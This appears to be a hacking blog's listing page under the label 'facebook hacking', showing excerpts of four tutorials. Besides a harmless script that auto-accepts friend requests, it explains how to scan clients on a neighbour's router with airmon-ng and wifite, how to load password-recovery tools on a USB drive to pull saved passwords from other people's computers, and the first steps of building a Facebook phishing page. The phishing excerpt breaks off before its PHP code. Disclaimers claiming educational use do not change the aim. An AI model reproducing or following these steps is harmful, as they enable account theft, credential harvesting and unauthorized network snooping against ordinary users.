Posts

Showing posts with the label facebook hacking

Scripts To Accept /Hide /Delete All Friend Requests At Once

Image
Sometimes its hard to accept all friend requests at once or sometimes we want to cancel all requests at once depending on our own decision. But its not an easy task to Accept/ Ignore and  Delete all friend request by clicking it manually each time. So we decided to solve this problem. Suppose we have 500 Friend Requests on Facebook where we want to all 500 peoples, its not easy to add each and every person manually, so in this case this post will very helpful for you by these scripts provided below. 1st copy the link. then scroll down to the end of your facebook requests press ctrl +shift +j and when the down tab opens, click console and ctl +v to paste the javascript and press enter               Accept All Friend Requests At Once     javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0); ...

How To Find Clients on Neighbor Router

Image
Well you are learning Hacking and the first thing which a best and top hacker dose is simply he collects information about its target from A to Z which not only helps him in hacking but also increases the chance to exploit the weakness , once you have the weakness of your target you can hit him right there at its weak point like someone said " You Miss I Hit " In Many cases you will need to find information about the router , such as finding the active clients on router. and it is easy to find clients on router of which you are connected but what if you are not connected ? so in this little tutorial you will learn how can you find active clients on router and also their mac address. How to know if clients are active on WiFi ?  To Do so simply disconenct your wifi and then start your monitor interface by typing the below command. airmon-ng start wlan0 Now you have activated monitor interface on mon0 . Now you will use wifite an automated wifi analyzing an...

How to Hack Passwords Using a USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. Please Note That we are not Responsible for any damage, This Article is Only for Educational Purpose, use this in legal way. You have to download total five hacking tools: 1: MessenPass 2: IE PassView 3: PasswordFox You can download three of them from below link: https://drive.google.com/open?id=0B9E9MT4XoPIDVjM3M1JZV2E1QjQ And for other two: 4: Mail PassView http://www.nirsoft.net/utils/mailpv.html 5: Protected Storage PassView http://www.nirsoft.net/utils/pspv.html Download this from end of both pages. After that extract all files and copy only executable(.exe) files to USB drive. ie: Copy the files –  mspass....

how to make facebook phishing page

Image
Through below steps anyone can easily make their own phishing page. Note : This tutorial is only for educational purpose .    Step 1: Go to facebook login page, and then right click on that and select save as (ctrl+s)             Then create one folder name Facebook or anything and save that page inside that folder. Step 2: Open html code of that page and find action=              You find something like this    action = " https://www.facebook.com/login.php? login_attempt=1 "              Remove whole link which is in "    ". And at a place of it write fb.php              Now save that html page. Step 3: Open notepad and copy below code and save it as fb.php inside that Facebook folder.               <?php         ...